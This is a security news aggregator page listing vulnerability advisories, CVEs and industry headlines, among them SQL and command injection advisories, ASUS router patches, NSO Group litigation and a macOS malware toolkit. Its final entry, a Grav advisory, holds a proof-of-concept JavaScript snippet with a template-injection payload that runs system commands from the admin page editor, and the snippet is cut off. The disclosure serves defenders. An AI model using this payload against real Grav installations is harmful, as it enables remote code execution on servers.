Security
Headlines
HeadlinesLatestCVEs

Tag

#apple

The Shop 2.5 SQL Injection

The Shop version 2.5 suffers from a remote SQL injection vulnerability.

Packet Storm
Open in Source
#sql#vulnerability#web#windows#apple#linux#js#auth#chrome#webkit
CVE-2023-34597: FIBARO | Motion Sensor - Motion detector

A vulnerability in Fibaro Motion Sensor firmware v3.4 allows attackers to cause a Denial of Service (DoS) via a crafted Z-Wave message.

Why businesses need a disinformation defense plan, with Lisa Kaplan: Lock and Code S04E13

Categories: Podcast This week on Lock and Code, we speak with Lisa Kaplan about why every business with an online presence should ready themselves against a potential disinformation campaign. (Read more...) The post Why businesses need a disinformation defense plan, with Lisa Kaplan: Lock and Code S04E13 appeared first on Malwarebytes Labs.

Update now! ASUS fixes nine security flaws

Categories: Exploits and vulnerabilities Categories: News Tags: ASUS Tags: router Tags: models Tags: CVE-2022-26376 Tags: CVE-2018-1160 Tags: Netatalk Tags: disable WAN ASUS has released firmware updates for several router models fixing two critical and several other security issues. (Read more...) The post Update now! ASUS fixes nine security flaws appeared first on Malwarebytes Labs.

SystemK NVR 504/508/516 Command Injection

SystemK NVR 504/508/516 version 2.3.5SK.30084998 suffer from a command injection vulnerability.

US Investors Sniffing Around Blacklisted NSO Group Assets

Pressure mounts on the NSO Group's business viability as Khashoggi widow joins group of plaintiffs suing the Israeli firm for Pegasus spyware abuse.

Researchers Discover New Sophisticated Toolkit Targeting Apple macOS Systems

Cybersecurity researchers have uncovered a set of malicious artifacts that they say is part of a sophisticated toolkit targeting Apple macOS systems. "As of now, these samples are still largely undetected and very little information is available about any of them," Bitdefender researchers Andrei Lapusneanu and Bogdan Botezatu said in a preliminary report published on Friday. The Romanian firm's

Humans Aren’t Mentally Ready for an AI-Saturated ‘Post-Truth World’

The AI era promises a flood of disinformation, deepfakes, and hallucinated “facts.” Psychologists are only beginning to grapple with the implications.

Security LeadHER Wraps Groundbreaking Inaugural Conference for Women in Security

This first-ever event, hosted by the Security Industry Association and ASIS International and designed to advance, connect, and empower women in security, gathered hundreds of industry leaders in Nashville June 12-13, 2023.

GHSA-f9jf-4cp4-4fq5: Grav Server Side Template Injection (SSTI) vulnerability

### Summary I found an RCE(Remote Code Execution) by SSTI in the admin screen. ### Details Remote Code Execution is possible by embedding malicious PHP code on the administrator screen by a user with page editing privileges. ### PoC 1. Log in to the administrator screen and access the edit screen of the default page "Typography". (`http://127.0.0.1:8000/admin/pages/typography`) 2. Open the browser's console screen and execute the following JavaScript code to confirm that an arbitrary command (`id`) is being executed. ```js (async () => { const nonce = document.querySelector("input[name=admin-nonce]").value; const id = document.querySelector("input[name=__unique_form_id__]").value; const payload = "{{['id']|map('system')|join}}"; // SSTI Payload const params = new URLSearchParams(); params.append("task", "save"); params.append("data[header][title]", "poc"); params.append("data[content]", payload); params.append("data[folder]", "poc"); params.append("data[route]", "...